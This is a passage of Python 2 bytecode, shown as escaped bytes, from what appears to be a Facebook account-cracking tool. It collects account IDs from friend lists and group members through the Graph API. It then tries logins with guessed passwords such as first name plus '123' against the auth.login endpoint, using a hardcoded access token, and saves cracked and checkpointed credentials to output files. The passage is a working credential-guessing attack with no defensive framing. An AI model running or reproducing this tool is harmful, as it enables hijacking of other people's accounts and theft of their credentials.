\x1b[1;97m...t\n\x00\x00\x00first_namet\x05\x00\x00\x0012345s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x17\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFounds4\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs$\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAccount Checkpointt\x06\x00\x00\x00sayangt\t\x00\x00\x00last_namet\x03\x00\x00\x00123Ry\x00\x00\x00t\x01\x00\x00\x00/R\n\x00\x00\x00t\t\x00\x00\x00kontol123t\t\x00\x00\x00sayang123s7\x00\x00\x00\x1b[1;91m[!] Sorry, failed to open the target password :(s\x1e\x00\x00\x00\x1b[1;91m[!] try it another way.s\x1b\x00\x00\x00\x1b[1;91m[!] Terget not found(\x16\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x06\x00\x00\x00urllibt\x07\x00\x00\x00urlopent\x04\x00\x00\x00loadRv\x00\x00\x00R\x16\x00\x00\x00R,\x00\x00\x00(\x10\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00t\x03\x00\x00\x00pz1Rl\x00\x00\x00Ro\x00\x00\x00t\x03\x00\x00\x00pz2t\x03\x00\x00\x00pz3t\x05\x00\x00\x00lahirt\x03\x00\x00\x00pz4t\x06\x00\x00\x00lahirst\x03\x00\x00\x00gazt\x03\x00\x00\x00pz5t\x03\x00\x00\x00pz6t\x03\x00\x00\x00pz7(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xab\x00\x00\x00\xe5\x03\x00\x00s@\x01\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\t\x01\x03\x01\x0c\x01\n\x01\x1b\x01\x12\x01\r\x01\n\x01\r\x01\n\x01\r\x01\t\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x12\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x05\x01\x05\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s6\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00a\n\x00t\t\x00d\x08\x00\x83\x01\x00a\x0b\x00y~\x00t\x02\x00t\n\x00d\x03\x00\x83\x02\x00a\x0c\x00t\r\x00d\t\x00\x83\x01\x00\x01xC\x00t\x0e\x00d\n\x00\x83\x01\x00D]5\x00}\x01\x00t\x0f\x00j\x10\x00d\x0b\x00t\x11\x00d\x0c\x00d\x0f\x00\x83\x00\x02}\x02\x00|\x02\x00j\x12\x00\x83\x00\x00\x01t\x13\x00j\x14\x00|\x02\x00\x83\x01\x00\x01q\xb3\x00Wx\x18\x00t\x13\x00D]\x10\x00}\x02\x00|\x02\x00j\x15\x00\x83\x00\x00\x01q\xf3\x00WWn\'\x00\x04t\x04\x00k\n\x00r1\x01\x01\x01\x01d\r\x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x10\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97ms+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97ms$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i(\x00\x00\x00t\x06\x00\x00\x00targett\x04\x00\x00\x00argss\x19\x00\x00\x00\x1b[1;91m[!] File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m](\x00\x00\x00\x00(\x17\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\x06\x00\x00\x00idlistt\x05\x00\x00\x00passwt\x04\x00\x00\x00fileR \x00\x00\x00t\x05\x00\x00\x00ranget\t\x00\x00\x00threadingt\x06\x00\x00\x00Threadt\x05\x00\x00\x00scrakt\x05\x00\x00\x00startt\x07\x00\x00\x00threadsR\x94\x00\x00\x00t\x04\x00\x00\x00joinRv\x00\x00\x00(\x03\x00\x00\x00R4\x00\x00\x00R\x10\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xac\x00\x00\x00\x98\x04\x00\x00s2\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01\x0f\x01\n\x01\x13\x01\x18\x01\n\x01\x11\x01\r\x01\x12\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sg\x02\x00\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r$\x00\x01\x01\x01n\x01\x00Xy\xfd\x01t\x03\x00t\x04\x00d\x02\x00\x83\x02\x00}\x00\x00|\x00\x00j\x05\x00\x83\x00\x00j\x06\x00\x83\x00\x00a\x07\x00x\xd5\x01t\x08\x00r \x02t\x08\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x01\x00d\x03\x00|\x01\x00\x17d\x04\x00\x17t\x0b\x00\x17d\x05\x00\x17}\x02\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00}\x03\x00t\x0e\x00j\x0f\x00|\x03\x00\x83\x01\x00}\x04\x00t\x10\x00t\x11\x00t\x07\x00\x83\x01\x00k\x02\x00r\xae\x00Pn\x00\x00d\x06\x00|\x04\x00k\x06\x00rE\x01t\x03\x00d\x07\x00d\x08\x00\x83\x02\x00}\x05\x00|\x05\x00j\x12\x00|\x01\x00d\t\x00\x17t\x0b\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x13\x00\x83\x00\x00\x01t\x14\x00j\x15\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x04\x00d\x06\x00\x19\x17\x83\x01\x00}\x06\x00t\x0e\x00j\x16\x00|\x06\x00j\x17\x00\x83\x01\x00}\x07\x00t\x18\x00j\x19\x00d\r\x00|\x01\x00\x17d\t\x00\x17t\x0b\x00\x17d\x0e\x00\x17|\x07\x00d\x0f\x00\x19\x17\x83\x01\x00\x01nu\x00d\x10\x00|\x04\x00d\x11\x00\x19k\x06\x00r\xa3\x01t\x03\x00d\x12\x00d\x08\x00\x83\x02\x00}\x08\x00|\x08\x00j\x12\x00|\x01\x00d\t\x00\x17t\x0b\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x08\x00j\x13\x00\x83\x00\x00\x01t\x1a\x00j\x19\x00d\x13\x00|\x01\x00\x17d\t\x00\x17t\x0b\x00\x17\x83\x01\x00\x01n\x17\x00t\x1b\x00j\x19\x00|\x01\x00\x83\x01\x00\x01t\x10\x00d\x14\x007a\x10\x00t\x1c\x00j\x1d\x00j\x12\x00d\x15\x00t\x1e\x00t\x10\x00\x83\x01\x00\x17d\x16\x00\x17t\x1e\x00t\x11\x00t\x07\x00\x83\x01\x00\x83\x01\x00\x17d\x17\x00\x17t\x1e\x00t\x11\x00t\x18\x00\x83\x01\x00\x83\x01\x00\x17d\x18\x00\x17t\x1e\x00t\x11\x00t\x1a\x00\x83\x01\x00\x83\x01\x00\x17\x83\x01\x00\x01t\x1c\x00j\x1d\x00j\x1f\x00\x83\x00\x00\x01qL\x00WWn>\x00\x04t \x00k\n\x00rG\x02\x01\x01\x01d\x19\x00GHt!\x00j"\x00d\x14\x00\x83\x01\x00\x01n\x1c\x00\x04t\x14\x00j#\x00j$\x00k\n\x00rb\x02\x01\x01\x01d\x1a\x00GHn\x01\x00Xd\x00\x00S(\x1b\x00\x00\x00NR\x90\x00\x00\x00R\'\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x0e\x00\x00\x00out/mbf_ok.txtR\x11\x00\x00\x00t\x01\x00\x00\x00|s\x01\x00\x00\x00\ns\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x1f\x00\x00\x00\x1b[1;97m[ \x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m ] s\x03\x00\x00\x00 =>R0\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x0e\x00\x00\x00out/mbf_cp.txts\x1f\x00\x00\x00\x1b[1;97m[ \x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m ] i\x01\x00\x00\x00s<\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m s\x11\x00\x00\x00 \x1b[1;96m>\x1b[1;97m s\x1d\x00\x00\x00 =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96ms%\x00\x00\x00 \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96ms\x11\x00\x00\x00\n\x1b[1;91m[!] Sleeps\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(%\x00\x00\x00R\x05\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R)\x00\x00\x00R\xca\x00\x00\x00R*\x00\x00\x00t\x05\x00\x00\x00splitt\x02\x00\x00\x00upR\xcc\x00\x00\x00t\x08\x00\x00\x00readlinet\x05\x00\x00\x00stripR\xcb\x00\x00\x00R\xbb\x00\x00\x00R\xbc\x00\x00\x00Rd\x00\x00\x00R\xbd\x00\x00\x00t\x04\x00\x00\x00backR\x0e\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x08\x00\x00\x00berhasilR\x94\x00\x00\x00t\x08\x00\x00\x00cekpointt\x05\x00\x00\x00gagalR\x06\x00\x00\x00R\x18\x00\x00\x00R\x17\x00\x00\x00R\x1b\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00(\t\x00\x00\x00t\x04\x00\x00\x00bukat\x08\x00\x00\x00usernameRk\x00\x00\x00Rl\x00\x00\x00t\x04\x00\x00\x00mpsht\x04\x00\x00\x00bisaR\x10\x00\x00\x00R\x1e\x00\x00\x00R7\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xd0\x00\x00\x00\xb4\x04\x00\x00sF\x00\x00\x00\x00\x02\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x0f\x01\x12\x01\t\x01\x12\x01\x16\x01\x0f\x01\x0f\x01\x12\x01\x04\x01\x0c\x01\x0f\x01\x19\x01\n\x01\x1f\x01\x12\x01(\x01\x10\x01\x0f\x01\x19\x01\n\x01\x1c\x02\r\x01\n\x01V\x00\x15\x01\r\x01\x05\x01\x10\x01\x13\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s_\x00\x00\x00Hd\x01\x00d\x02\x00\x14GHx\x13\x00t\x00\x00D]\x0b\x00}\x00\x00|\x00\x00GHq\x11\x00Wx\x13\x00t\x01\x00D]\x0b\x00}\x01\x00|\x01\x00GHq\'\x00Wd\x01\x00d\x02\x00\x14GHd\x03\x00t\x02\x00t\x03\x00t\x04\x00\x83\x01\x00\x83\x01\x00\x17GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ni*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00\x1b[31m[x] Failed \x1b[1;97m--> (\x06\x00\x00\x00R\xda\x00\x00\x00R\xdb\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\xdc\x00\x00\x00R\x08\x00\x00\x00(\x02\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00c(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xad\x00\x00\x00\xda\x04\x00\x00s\x12\x00\x00\x00\x00\x01\x01\x01\t\x02\r\x01\t\x02\r\x01\t\x02\t\x01\x15\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x96\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x15\x00\x00\x001]. Crack list friends\x16\x00\x00\x002]. Crack from friends\x1b\x00\x00\x003]. Crack from member groups\x08\x00\x00\x000]. Backs\x03\x00\x00\x00\xe2\x95\x91(\x0b\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00pilih_super(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xae\x00\x00\x00\xe9\x04\x00\x00s \x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0f\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x84\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n|\x02|\x00\x00d\x04\x00k\x02\x00r\x9d\x00t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x05\x00d\x06\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x07\x00t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00x,\x02|\x02\x00d\x08\x00\x19D]\x17\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00d\t\x00\x19\x83\x01\x00\x01q\x7f\x00Wn\x06\x02|\x00\x00d\n\x00k\x02\x00r\x8f\x01t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x00\x00d\x0b\x00\x83\x01\x00}\x04\x00y>\x00t\x06\x00j\x07\x00d\x0c\x00|\x04\x00\x17d\r\x00\x17t\x08\x00\x17\x83\x01\x00}\x05\x00t\t\x00j\n\x00|\x05\x00j\x0b\x00\x83\x01\x00}\x06\x00d\x0e\x00|\x06\x00d\x0f\x00\x19\x17GHWn\'\x00\x04t\x0e\x00k\n\x00r.\x01\x01\x01\x01d\x10\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00d\x12\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x0c\x00|\x04\x00\x17d\x13\x00\x17t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00x:\x01|\x02\x00d\x08\x00\x19D]\x17\x00}\x07\x00t\x0c\x00j\r\x00|\x07\x00d\t\x00\x19\x83\x01\x00\x01qq\x01Wn\x14\x01|\x00\x00d\x14\x00k\x02\x00r\x81\x02t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x00\x00d\x15\x00\x83\x01\x00}\x08\x00y>\x00t\x06\x00j\x07\x00d\x16\x00|\x08\x00\x17d\x17\x00\x17t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\t\x00d\x18\x00|\t\x00d\x0f\x00\x19\x17GHWn\'\x00\x04t\x0e\x00k\n\x00r \x02\x01\x01\x01d\x19\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x0c\x00|\x08\x00\x17d\x1b\x00\x17t\x08\x00\x17\x83\x01\x00}\n\x00t\t\x00j\n\x00|\n\x00j\x0b\x00\x83\x01\x00}\x03\x00xH\x00|\x03\x00d\x08\x00\x19D]\x17\x00}\x0b\x00t\x0c\x00j\r\x00|\x0b\x00d\t\x00\x19\x83\x01\x00\x01qc\x02Wn"\x00|\x00\x00d\x1c\x00k\x02\x00r\x97\x02t\x10\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x1d\x00t\x11\x00t\x12\x00t\x0c\x00\x83\x01\x00\x83\x01\x00\x17GHt\x05\x00d\x1e\x00\x83\x01\x00\x01d\x1f\x00d \x00d!\x00g\x03\x00}\x0c\x00x0\x00|\x0c\x00D](\x00}\r\x00d"\x00|\r\x00\x17Gt\x13\x00j\x14\x00j\x15\x00\x83\x00\x00\x01t\x16\x00j\x17\x00d#\x00\x83\x01\x00\x01q\xd8\x02WHd$\x00d%\x00\x14GHd&\x00\x84\x00\x00}\x0e\x00t\x18\x00d\'\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x19\x00|\x0e\x00t\x0c\x00\x83\x02\x00\x01d$\x00d%\x00\x14GHd(\x00GHd)\x00t\x11\x00t\x12\x00t\x1a\x00\x83\x01\x00\x83\x01\x00\x17d*\x00\x17t\x11\x00t\x12\x00t\x1b\x00\x83\x01\x00\x83\x01\x00\x17GHd+\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01d\x00\x00S(,\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R&\x00\x00\x00s0\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00Rj\x00\x00\x00R9\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s5\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all id from friend \x1b[1;97m...s\x16\x00\x00\x00/friends?access_token=Rs\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds2\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member id \x1b[1;97m...s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=R:\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97ms$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s0\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97mi\x01\x00\x00\x00i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90c\x01\x00\x00\x00\x0e\x00\x00\x00\x05\x00\x00\x00S\x00\x00\x00sZ\x05\x00\x00|\x00\x00}\x01\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r*\x00\x01\x01\x01n\x01\x00Xy!\x05t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\x03\x00\x17t\x05\x00\x17\x83\x01\x00}\x02\x00t\x06\x00j\x07\x00|\x02\x00j\x08\x00\x83\x01\x00}\x03\x00|\x03\x00d\x04\x00\x19d\x05\x00\x17}\x04\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x04\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\x05\x01t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x04\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01nF\x04d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00r[\x01t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x04\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n\xf0\x03d\x14\x00}\n\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\n\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xfd\x01t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\n\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01nN\x03d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rS\x02t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\n\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01n\xf8\x02|\x03\x00d\x04\x00\x19d\x15\x00\x17}\x0b\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0b\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xfd\x02t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x0b\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01nN\x02d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rS\x03t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x0b\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01n\xf8\x01d\x16\x00}\x0c\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0c\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xf5\x03t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x0c\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01nV\x01d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rK\x04t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}